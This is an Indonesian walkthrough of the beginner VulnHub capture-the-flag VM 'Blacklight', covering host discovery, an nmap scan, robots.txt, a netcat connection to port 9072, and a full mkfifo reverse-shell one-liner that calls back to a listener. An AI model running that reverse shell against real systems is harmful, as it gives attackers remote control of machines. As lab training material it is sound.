Blacklight adalah tantangan CTF tingkat pemula. VM tersedia di VulnHub. Tantangan ini sangat mudah dan singkat dibandingkan dengan Tantangan VulnHub lainnya.
Impor VM ke Virtualbox dan hidupkan.
Gunakan netdiscover untuk menentukan IP
sudo netdiscover -i wlan0 -r 192.168.0.1/24
Sekarang, edit file “/ etc / hosts” Kamu untuk mendaftarkan IP ini ke DNS lokal Kamu
sudo nano /etc/hosts
Jalankan port pada Nmap Scan.
nmap -p- bl.local
Ada Server HTTP berjalan dan port yang tidak dikenal terbuka. Pertama, Periksa Server HTTP
Kode sumber halaman web default tidak mengungkapkan apa pun, mari kita periksa "robots.txt".
robots.txt ”mengungkapkan bendera pertama kami ditambah petunjuk yang menunjuk pada port 9072 yang sebelumnya kami temukan menggunakan Nmap. Sekarang, mari sambungkan ke port tersebut menggunakan Netcat.
nc -v bl.local 9072
".Help" mengungkapkan bahwa kita dapat menjalankan perintah di shell, mari kita jalankan shell reverse Netcat kita dari PentestMonkey.
nc -nlvp 1234
dan kemudian jalankan shell reverse berikut.
exec `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.101 1234 >/tmp/f`
Lihat Shell Nya Sudah Di Eksekusi
